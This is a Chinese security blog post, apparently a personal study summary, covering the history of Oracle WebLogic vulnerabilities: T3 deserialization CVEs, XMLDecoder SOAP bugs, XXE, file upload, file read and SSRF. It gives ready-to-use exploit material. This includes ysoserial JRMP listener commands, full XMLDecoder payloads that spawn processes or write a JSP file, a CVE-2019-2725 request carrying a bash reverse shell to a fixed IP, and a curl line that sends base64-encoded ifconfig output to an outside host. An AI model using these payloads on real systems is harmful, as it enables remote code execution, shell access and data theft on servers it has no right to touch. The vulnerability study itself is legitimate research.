weblogic基础简介及系列漏洞调试总结

发表于   |   更新于   |   分类于
文章字数: 3,635 字   |  阅读时长≈ 16 分钟

前言

weblogic是作为我入门 Java 安全第一个跟踪分析的框架及漏洞点,当写下这篇文章的时候我也是准备从零开始分析调试weblogic历史上全部的 RCE 漏洞。在整个过程中收获良多,为了确保对此系列漏洞的理解到位,不产生太离谱的偏差,一遍又一遍的 Debug,同时参考了网上无数的相关复现文章,消耗了大量的时间,在漏洞分析过程中,由于很多细节自己知识匮乏,也没有解释的太明白,在漏洞复现的时候也没有跟的太深,但是也没办法了,以我目前的能力只能做到这个程度了。

希望感兴趣的读者能够按照从前到后的顺序进行查看,否则可能有看不懂的情况,因为我在写的过程中也是跟随漏洞版本,利用已有的知识进行编制和测试的,所以会有一定的前置知识的需求。

部分内容引用自jjf012的文章,现注明出处!如有侵权,请联系我删除~

作者:jjf012
链接:https://www.jianshu.com/p/38033935a914
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

目录

点击左边连接可以直接跳到对应漏洞的调试记录。

链接 描述
攻击Java Web应用 Java安全相关技术、IDEA调试技巧
weblogic简介及补丁分析方法(转) weblogic基础及补丁分析
weblogicT3协议及T3反序列化漏洞简介 weblogic RMI T3必须知道的知识
weblogic环境部署与远程调试 weblogic环境部署与远程调试
CVE-2015-4852-Weblogic反序列化漏洞复现与分析 CVE-2015-4852漏洞复现与分析
待补充其他 待补充其他

历史漏洞整理

T3协议

  • 什么是RMI:远程方法调用(Remote Method Invocation)。能够让在某个java虚拟机上的对象像调用本地对象一样调用另一个java 虚拟机中的对象上的方法。
  • Java远程消息交换协议 JRMP 即Java Remote MessagingProtocol,是特定于Java技术的、用于查找和引用远程对象的协议。这是运行在Java远程方法调用RMI之下、TCP/IP之上的线路层协议。,也可以使用CORBA兼容的方法实现。详细介绍请参考:https://blog.csdn.net/cdl2008sky/article/details/6844719

T3协议是用于Weblogic服务器和其他Java Application之间传输信息的协议,是实现上述RMI远程过程调用的专有协议,其允许客户端进行JNDI调用。

当Weblogic发起一个T3协议连接的时候,Weblogic会连接每一个Java虚拟机并传输流量,由于通信过程得到了极大的简化,所以使得其在操作系统资源利用上实现的高效以及最大化,同时提高了传输速度。

CVE-2015-4852

此漏洞主要是由于apache的标准库中Apache Commons Collections基础库的TransformedMap类中。根据@breenmachine的文章,他当时找漏洞的方法是,对weblogic在7001端口的T3 协议进行抓包,发现流量中有java反序列化之后Magic(幻数)ac ed 00 05,然后替换掉对应的部分。

利用方式等同下面的CVE-2016-3510,只不过payload不一样。

CVE-2016-0638

此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上:

  • weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream
  • weblogic.rjvm.MsgAbbrevInputStream.class
  • weblogic.iiop.Utils.class

所以如果能找到可以在其readObject中创建自己的InputStream的对象,并且不是使用黑名单中的ServerChannelInputStreamMsgAbbrevInputStreamreadExternal进行的反序列化,最后调用readObject()方法进行反序列化的数据的读取,这样就可以执行含有恶意代码的序列化代码。依据这个思路找到了weblogic.jms.common.StreamMessageImpl类,其中的readExternal()方法也符合攻击的需求。

利用方式等同下面的CVE-2016-3510,只不过payload不一样。

CVE-2016-3510

此漏洞是与CVE-2016-0638漏洞利用方式相似,只是选择了weblogic.corba.utils.MarshalledObject进行绕过,绕过之前的CVE-2015-4852CVE-2016-0638漏洞的修复补丁。
利用方式参照 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/WebLogic%20CVE-2016-3510.py

CVE-2017-3248

Apache Commons Collections基础的漏洞已经进行修补,所以CVE-2017-3248漏洞利用方法与之前三个漏洞不同,这次主要是利用了JRMP java远程方法协议。
利用java.rmi.registry.Registry,序列化RemoteObjectInvocationHandler,并使用UnicastRef和远端建立tcp连接,获取RMI registry,最终将加载的内容利用readObject()进行解析,导致之前序列化的恶意代码执行。
利用方式可以参照 https://github.com/quentinhardy/scriptsAndExploits
或者下面

CVE-2018-2628

CVE-2018-2628漏洞与CVE-2017-3248漏洞利用方法类似,仅仅更换了使用的rmi接口,用java.rmi.activation.Activator替换了CVE-2017-3248所使用的java.rmi.registry.Registry,从而绕过resolveProxyClass的判断,成功绕过了CVE-2017-3248漏洞的修复补丁。

vulhub演示地址

1
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

其中,[command]即为想执行的命令,而[listen port]JRMP Server监听的端口。

1
python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[JRMPClient]:有JRMPClientJRMPClient2两个选项,两者只有接口类名的差别。然后weblogic就会回连到攻击者JRMPListener ip,执行[command]

CVE-2018-2893

CVE-2018-2893漏洞绕过方式是利用StreamMessageImplysoserial工具中的JRMPClient生成的payloadObject进行封装。相当于使用CVE-2016-0638的利用方式加上CVE-2017-3248的 payload 来绕过补丁。

利用方式可参考https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2628

CVE-2018-3191

没看到具体介绍,只知道也是T3协议的锅。

这里下载payload生成,https://github.com/voidfyoo/CVE-2018-3191/releases

weblogic-spring-jndi-12.2.1.3.jar for weblogic:

  • 12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

  • 10.3.6.0
  • 12.2.1.0
  • 12.1.3.0
  • 12.2.1.1

先生成一个payload,触发weblogic回连。

1
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://攻击机ip:端口/exp > payload

攻击者IP开启rmi服务

1
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections1 "要执行的指令"

然后用weblogic.py向weblogic发起请求

1
python weblogic.py 172.20.0.2 7001 payload

weblogic就会回连到攻击者IP,然后执行[command]

CVE-2018-3197

没找到介绍

CVE-2018-3201

没找到介绍

CVE-2018-3245

是补来补去一直没有修好的Weblogic JRMP反序列化漏洞。只要满足继承java.rmi.server.RemoteObject,且不在黑名单之中的类对象。 这里通过ReferenceWrapper_Stub这个类对象绕过。

POC生成可以参考 https://github.com/pyn3rd/CVE-2018-3245

利用方式等同 CVE-2018-3191

CVE-2019-2890

CVE-2019-2890又又又绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击,但该漏洞利用条件较高,官方也归类为需要身份认证。具体分析过程看 https://paper.seebug.org/1069/,文章的作者也给出了漏洞验证的方式:https://github.com/SukaraLin/CVE-2019-2890

标记重点:需要先获取服务器上的密钥文件SerializedSystemIni.dat来加密序列化后的字节流,而这个文件每台服务器都不一样。这就是这个漏洞鸡肋的地方。

HTTP协议

CVE-2018-3252

DeploymentService组件存在反序列化漏洞,需要登陆后才能使用。POC生成可以参考 https://github.com/b1ueb0y/CVE-2018-3252

CVE-2017-3506

此漏洞主要是由于wls组件使用了webservice来处理soap请求,在weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法中,当localHeader1localHeader2都不为null时,将会把<work:WorkContext>所包含的数据传入weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld方法,在此方法中,对WorkContextXmlInputAdapter类进行了实例化,并调用WorkContextXmlInputAdapter类的构造方法,通过XMLDecoder()进行反序列化操作。

可利用路径如下:

1
2
3
4
5
6
7
8
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

下面的POC等同于执行命令/bin/bash -c "touch /tmp/123"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>/bin/bash</string>
              </void>
              <void index="1">
                <string>-c</string>
              </void>
              <void index="2">
                <string>touch /tmp/123</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
CVE-2017-10271 Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞

CVE-2017-10271是对CVE-2017-3506修复补丁的一次绕过,可以看到唯一的变化就是把之前的Object标签变成了void标签。

  • bea_wls9_async_response
  • _WL_internal/bea_wls_internal/9j4dqk/war/
  • uddiexplorer
  • _WL_internal/wls-wast

访问http://your-ip:7001/bea_wls_internal/test.jsp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
  <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

除此之外,网上还出现了一些变形的payload,大家发现可以直接利用new和method元素完成payload的构造,连void元素都不用了,所以payload还可以这样写:

1
2
3
4
5
6
<java version="1.4.0" class="java.beans.XMLDecoder">
    <new class="java.lang.ProcessBuilder">
        <string>calc</string>
        <method name="start" />
    </new>
</java>
CVE-2019-2725 wls9-async 反序列化漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
POST /_async/AsyncResponseService HTTP/1.1
Host: 172.xxx:7001
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
 
<soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' xmlns:wsa='http://www.w3.org/2005/08/addressing' xmlns:asy='http://www.bea.com/async/AsyncResponseService'>
    <soapenv:Header>
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'>
            <void class='java.lang.ProcessBuilder'>
                <array class='java.lang.String' length='3'>
                    <void index='0'>
                        <string>/bin/bash</string>
                    </void>
                    <void index='1'>
                        <string>-c</string>
                    </void>
                    <void index='2'>
                        <string>bash -i >&amp; /dev/tcp/192.168.209.1/1234 0>&amp;1</string>
                    </void>
                </array>
                <void method='start' /></void>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
        <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>

可以看到这回是利用class标签构造类,但是由于限制了method从而无法调用函数,因此,找了几个可以通过构造函数进行反序列化的类。网上通用的有

  • FileSystemXmlApplicationContext
  • UnitOfWorkChangeSet

利用方式可参考 https://github.com/lufeirider/CVE-2019-2725

CVE-2019-2729

翻译,https://xz.aliyun.com/t/5496

这个漏洞是CVE-2019-2725的Bypass,对于JDK1.6,使用<array method ="forName">标记有效地替换了<class>标记的功能。只需用<array method ="forName">标签替换<class>标签就可以有效地绕过黑名单。

利用可以参考下面列出的漏洞检测脚本,改个命令即可。也可以参考这个,https://github.com/waffl3ss/CVE-2019-2729/blob/master/CVE-2019-2729.py

https://www.freebuf.com/vuls/206374.html
根据近些年 weblogic 由于 XMLDecoder 导致的反序列漏洞的缝缝补补中,可以看到虽然绕过的 poc 层出不穷,但是利用的范围却越来越窄,从一开始的所有 jdk 通用,到 7u21 以下可以利用成功,再到最近的绕过已经只能在 1.6 利用成功,可以看到,保持jdk 版本的高版本可以有效的防范 java 反序列化攻击。与此同时,对于基本用不到的 weblogic 组件,还是能删就删为好。

XXE

https://paper.seebug.org/906/

可以利用XXE读取base_domain中的名为SerializedSystemIni.dat的密钥和config.xml密文,用weblogic_decrypt.jar解密weblogic的登陆密码。
11g的密文在
安装目录/user_projects/domains/base_domain/servers/AdminServer/security/boot.properties
密钥在安装目录/user_projects/domains/base_domain/security/SerializedSystemIni.dat
10的密文在
安装目录/samples/domains/wl_server/security/boot.properties

任意文件上传

CVE-2019-2618

CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。登录weblogic之后,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。
另外,weblogic的DeploymentService接口的正常功能本来就能部署war包。

利用方式参考:https://github.com/jas502n/cve-2019-2618

任意文件读取

CVE-2019-2615

需要登陆后才能利用。

1
2
3
4
5
6
7
8
9
10
GET /bea_wls_management_internal2/wl_management HTTP/1.1
Host: 127.0.0.1:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
username:weblogic
password:admin123456
wl_request_type:wl_jsp_refresh_request
adminPath:c:\windows\win.ini
CVE-2014-4210 SSRF
1
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7000

关于命令回显

在linux中,被反引号包裹的字符串会被解释为命令行

1
2
echo `whoami` test
root test

windows下执行set可以看到一堆系统变量,用%号可以调用这些变量

1
2
echo %COMPUTERNAME%
你的计算机名

命令注入:利用管道符来注入要执行的命令

image-20210623175135552

还有个|,如127.0.0.1|whoami,回显的是whoami的结果

利用Ping命令和dnslog结合获取回显结果

1
2
C:\Windows\System32\cmd.exe /c "ping -n 3 test.com || ping -c 3 test.com"
/bin/bash -c "ping -n 3 test.com || ping -c 3 test.com"

目测每个目标要执行两次POC,另外linux还可以通过curl命令来回显

1
curl test.com/`ifconfig|base64|tr '\n' '-'`

漏洞检测

只是检测是否存在漏洞,不是利用工具

参考文章
-------- 本文结束 感谢阅读 --------

本文标题:weblogic基础简介及系列漏洞调试总结

文章作者:FunctFan

发布时间:2021年06月22日 - 21:31:55

最后更新:2021年06月23日 - 05:53:09

原始链接:https://functfan.github.io/posts/1610177997/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。